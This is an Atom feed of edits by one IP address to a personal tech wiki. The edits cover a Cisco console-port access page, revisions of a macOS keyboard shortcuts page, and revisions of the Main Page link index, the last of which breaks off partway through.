<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.luccapirovano.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=50.220.241.211</id>
	<title>Lucca&#039;s Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.luccapirovano.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=50.220.241.211"/>
	<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php/Special:Contributions/50.220.241.211"/>
	<updated>2026-09-25T04:54:58Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.43.3</generator>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Console_Port_Access&amp;diff=1235</id>
		<title>Console Port Access</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Console_Port_Access&amp;diff=1235"/>
		<updated>2026-09-02T18:40:33Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This is the command you would use on linux to access a cisco device&#039;s console port. This would usually be through a RS232 to USB adapter. &lt;br /&gt;
 screen /dev/ttyUSB0 9600&lt;br /&gt;
*You might need root or dialout permissons.&lt;br /&gt;
&lt;br /&gt;
Even though the console port on a cisco switch might be RJ45 like ethernet, its just RS232 serial with a different connector, hence why you need the adapter. &lt;br /&gt;
&lt;br /&gt;
On Windows you would probably want to use something like PuTTY.&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=OSX_Keyboard_Shortcuts&amp;diff=1217</id>
		<title>OSX Keyboard Shortcuts</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=OSX_Keyboard_Shortcuts&amp;diff=1217"/>
		<updated>2026-04-08T21:49:58Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= macOS Keyboard Shortcuts =&lt;br /&gt;
&lt;br /&gt;
[[File:MacOS_Keyboard.png|thumb|center|600px|Example Mac keyboard layout and modifier keys]]&lt;br /&gt;
&lt;br /&gt;
== General Shortcuts ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Shortcut !! Action&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ C || Copy&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ X || Cut&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ V || Paste&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ Z || Undo&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ Z || Redo&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ A || Select all&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ F || Find&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ H || Hide app&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ Q || Quit app&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ W || Close window&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ M || Minimize window&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Finder ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Shortcut !! Action&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ N || New Finder window&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ N || New folder&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ I || Get info&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ Delete || Move to Trash&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ Delete || Empty Trash&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ D || Duplicate&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ L || Make alias&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ 1 || Icon view&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ 2 || List view&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ 3 || Column view&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ 4 || Gallery view&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Screenshots ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Shortcut !! Action&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ 3 || Full screen screenshot&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ 4 || Selection screenshot&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ 4 then Space || Window screenshot&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ 5 || Screenshot toolbar&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== System ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Shortcut !! Action&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ ⌥ Esc || Force quit&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ Space || Spotlight&lt;br /&gt;
|-&lt;br /&gt;
| Control ⌘ Q || Lock screen&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ ⌥ Power || Sleep&lt;br /&gt;
|-&lt;br /&gt;
| ⇧ ⌘ Q || Log out&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Text Editing ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Shortcut !! Action&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ B || Bold&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ I || Italic&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ U || Underline&lt;br /&gt;
|-&lt;br /&gt;
| ⌥ Delete || Delete previous word&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ Delete || Delete to start of line&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ → || End of line&lt;br /&gt;
|-&lt;br /&gt;
| ⌘ ← || Start of line&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Category:macOS]]&lt;br /&gt;
[[Category:Keyboard Shortcuts]]&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=OSX_Keyboard_Shortcuts&amp;diff=1216</id>
		<title>OSX Keyboard Shortcuts</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=OSX_Keyboard_Shortcuts&amp;diff=1216"/>
		<updated>2026-04-08T21:49:10Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: Created page with &amp;quot;= macOS Keyboard Shortcuts =  This page provides a comprehensive list of common and advanced keyboard shortcuts for macOS. These shortcuts can improve productivity and efficiency when using a Mac.  Example Mac keyboard layout and common modifier keys  == Modifier Keys ==  * &amp;#039;&amp;#039;&amp;#039;Command (⌘)&amp;#039;&amp;#039;&amp;#039; * &amp;#039;&amp;#039;&amp;#039;Option (⌥)&amp;#039;&amp;#039;&amp;#039; * &amp;#039;&amp;#039;&amp;#039;Control (⌃)&amp;#039;&amp;#039;&amp;#039; * &amp;#039;&amp;#039;&amp;#039;Shift (⇧)&amp;#039;&amp;#039;&amp;#039; * &amp;#039;&amp;#039;&amp;#039;Caps Lock (⇪)&amp;#039;&amp;#039;&amp;#039;  ---  == General Shortcuts == {| class=&amp;quot;wikita...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= macOS Keyboard Shortcuts =&lt;br /&gt;
&lt;br /&gt;
This page provides a comprehensive list of common and advanced keyboard shortcuts for macOS. These shortcuts can improve productivity and efficiency when using a Mac.&lt;br /&gt;
&lt;br /&gt;
[[File:MacOS_Keyboard.png|thumb|center|600px|Example Mac keyboard layout and common modifier keys]]&lt;br /&gt;
&lt;br /&gt;
== Modifier Keys ==&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Command (⌘)&#039;&#039;&#039;&lt;br /&gt;
* &#039;&#039;&#039;Option (⌥)&#039;&#039;&#039;&lt;br /&gt;
* &#039;&#039;&#039;Control (⌃)&#039;&#039;&#039;&lt;br /&gt;
* &#039;&#039;&#039;Shift (⇧)&#039;&#039;&#039;&lt;br /&gt;
* &#039;&#039;&#039;Caps Lock (⇪)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== General Shortcuts ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                      |&lt;br /&gt;
| -------------------- | - | -------------------- |&lt;br /&gt;
| ⌘ + C                |   | Copy                 |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + X                |   | Cut                  |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + V                |   | Paste                |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + Z                |   | Undo                 |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⇧ + ⌘ + Z            |   | Redo                 |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + A                |   | Select All           |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + F                |   | Find                 |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + G                |   | Find Next            |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⇧ + ⌘ + G            |   | Find Previous        |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + H                |   | Hide current app     |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌥ + ⌘ + H            |   | Hide other apps      |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + Q                |   | Quit app             |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + W                |   | Close window/tab     |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌥ + ⌘ + W            |   | Close all windows    |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + M                |   | Minimize window      |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌥ + ⌘ + M            |   | Minimize all windows |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + ,                |   | Open preferences     |&lt;br /&gt;
| }                    |   |                      |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Finder Shortcuts ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                                  |&lt;br /&gt;
| -------------------- | - | -------------------------------- |&lt;br /&gt;
| ⌘ + N                |   | New Finder window                |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⇧ + ⌘ + N            |   | New folder                       |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + I                |   | Get info                         |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + Delete           |   | Move to Trash                    |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⇧ + ⌘ + Delete       |   | Empty Trash                      |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌥ + ⇧ + ⌘ + Delete   |   | Empty Trash without confirmation |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + D                |   | Duplicate file                   |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + L                |   | Make alias                       |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + R                |   | Show original file               |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + T                |   | Show/hide tab bar                |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + 1                |   | Icon view                        |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + 2                |   | List view                        |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + 3                |   | Column view                      |&lt;br /&gt;
| -                    |   |                                  |&lt;br /&gt;
| ⌘ + 4                |   | Gallery view                     |&lt;br /&gt;
| }                    |   |                                  |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Power ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                      |&lt;br /&gt;
| -------------------- | - | -------------------- |&lt;br /&gt;
| ⌘ + ⌥ + Esc          |   | Force quit dialog    |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + Space            |   | Spotlight search     |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| Control + ⌘ + Q      |   | Lock screen          |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| Control + Power      |   | Show shutdown dialog |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⌘ + ⌥ + Power        |   | Sleep                |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⇧ + ⌘ + Q            |   | Log out              |&lt;br /&gt;
| -                    |   |                      |&lt;br /&gt;
| ⇧ + ⌥ + ⌘ + Q        |   | Log out immediately  |&lt;br /&gt;
| }                    |   |                      |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Screenshots ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action  |   |                                     |&lt;br /&gt;
| --------------------- | - | ----------------------------------- |&lt;br /&gt;
| ⇧ + ⌘ + 3             |   | Capture entire screen               |&lt;br /&gt;
| -                     |   |                                     |&lt;br /&gt;
| ⇧ + ⌘ + 4             |   | Capture selected portion            |&lt;br /&gt;
| -                     |   |                                     |&lt;br /&gt;
| ⇧ + ⌘ + 4, then Space |   | Capture window                      |&lt;br /&gt;
| -                     |   |                                     |&lt;br /&gt;
| ⇧ + ⌘ + 5             |   | Screenshot toolbar                  |&lt;br /&gt;
| -                     |   |                                     |&lt;br /&gt;
| ⇧ + ⌘ + 6             |   | Touch Bar screenshot (if available) |&lt;br /&gt;
| }                     |   |                                     |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Text Editing ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                             |&lt;br /&gt;
| -------------------- | - | --------------------------- |&lt;br /&gt;
| ⌘ + B                |   | Bold                        |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌘ + I                |   | Italic                      |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌘ + U                |   | Underline                   |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌥ + Delete           |   | Delete previous word        |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌘ + Delete           |   | Delete to beginning of line |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌘ + →                |   | Move to end of line         |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌘ + ←                |   | Move to beginning of line   |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌥ + →                |   | Move one word right         |&lt;br /&gt;
| -                    |   |                             |&lt;br /&gt;
| ⌥ + ←                |   | Move one word left          |&lt;br /&gt;
| }                    |   |                             |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Safari &amp;amp; Browsers ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                   |&lt;br /&gt;
| -------------------- | - | ----------------- |&lt;br /&gt;
| ⌘ + T                |   | New tab           |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⌘ + W                |   | Close tab         |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⌘ + L                |   | Focus address bar |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⌘ + R                |   | Reload page       |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⇧ + ⌘ + R            |   | Hard reload       |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⌘ + Y                |   | History           |&lt;br /&gt;
| -                    |   |                   |&lt;br /&gt;
| ⌘ + D                |   | Bookmark page     |&lt;br /&gt;
| }                    |   |                   |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Mission Control &amp;amp; Navigation ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action |   |                        |&lt;br /&gt;
| -------------------- | - | ---------------------- |&lt;br /&gt;
| Control + ↑          |   | Mission Control        |&lt;br /&gt;
| -                    |   |                        |&lt;br /&gt;
| Control + ↓          |   | App Exposé             |&lt;br /&gt;
| -                    |   |                        |&lt;br /&gt;
| Control + →          |   | Next desktop space     |&lt;br /&gt;
| -                    |   |                        |&lt;br /&gt;
| Control + ←          |   | Previous desktop space |&lt;br /&gt;
| -                    |   |                        |&lt;br /&gt;
| ⌘ + Tab              |   | Switch apps            |&lt;br /&gt;
| -                    |   |                        |&lt;br /&gt;
| ⇧ + ⌘ + Tab          |   | Reverse app switch     |&lt;br /&gt;
| }                    |   |                        |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Advanced &amp;amp; Lesser-Known Shortcuts ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
&lt;br /&gt;
| ! Shortcut !! Action          |   |                           |&lt;br /&gt;
| ----------------------------- | - | ------------------------- |&lt;br /&gt;
| ⌥ + ⌘ + D                     |   | Show/hide Dock            |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| ⌥ + ⌘ + P + R                 |   | Reset NVRAM (startup)     |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| ⇧ (hold during boot)          |   | Safe Mode                 |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| D (hold during boot)          |   | Apple Diagnostics         |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| ⌘ + L (Finder)                |   | Jump to selection         |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| ⌥ + Click (volume/brightness) |   | Open settings             |&lt;br /&gt;
| -                             |   |                           |&lt;br /&gt;
| ⌘ + Drag                      |   | Move file instead of copy |&lt;br /&gt;
| }                             |   |                           |&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
== Notes ==&lt;br /&gt;
&lt;br /&gt;
* Some shortcuts may vary depending on macOS version.&lt;br /&gt;
* Keyboard layouts may differ by region.&lt;br /&gt;
* Users can customize shortcuts in &#039;&#039;&#039;System Settings → Keyboard → Keyboard Shortcuts&#039;&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
[[Category:macOS]]&lt;br /&gt;
[[Category:Keyboard Shortcuts]]&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1215</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1215"/>
		<updated>2026-04-08T21:49:05Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
(use ctrl+shift+t to change theme settings)&lt;br /&gt;
&lt;br /&gt;
chrome://settings/content/all?search=cache+ (to delete / manage site data)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]] | [[TLS Setting in Internet Options]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf (pdf)] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf (pdf)] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [https://www.exploit-db.com/ Exploit-DB] | [[Performing a SYN flood attack]] | [https://attack.mitre.org/matrices/enterprise/ Mitre Att&amp;amp;ck] | [https://en.wikipedia.org/wiki/Christmas_tree_packet Christmas Tree Packet]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]] | [[OSX Keyboard Shortcuts]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Networking/Cisco: | [[Cisco Commands]] | [[Cisco Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] | [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping] | [[Console Port Access]] | [[Anti-AI Scraper Tarpits]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf (pdf)]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] | [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis] | [https://en.wikipedia.org/wiki/Anna&#039;s_Archive Anna&#039;s Archive]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tech &amp;amp; Vulnerability News: | [https://lwn.net/ LWN.net] | [https://news.ycombinator.com/ Hacker News] | [https://www.jwz.org/blog/ JWZ&#039;s Blog] | [https://drewdevault.com/ Drew Devault&#039;s Blog]&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1214</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1214"/>
		<updated>2026-04-08T21:06:56Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&lt;br /&gt;
(use ctrl+shift+t to change theme settings)&lt;br /&gt;
&lt;br /&gt;
chrome://settings/content/all?search=cache+ (to delete / manage site data)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]] | [[TLS Setting in Internet Options]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf (pdf)] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf (pdf)] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [https://www.exploit-db.com/ Exploit-DB] | [[Performing a SYN flood attack]] | [https://attack.mitre.org/matrices/enterprise/ Mitre Att&amp;amp;ck] | [https://en.wikipedia.org/wiki/Christmas_tree_packet Christmas Tree Packet]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Networking/Cisco: | [[Cisco Commands]] | [[Cisco Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] | [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping] | [[Console Port Access]] | [[Anti-AI Scraper Tarpits]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
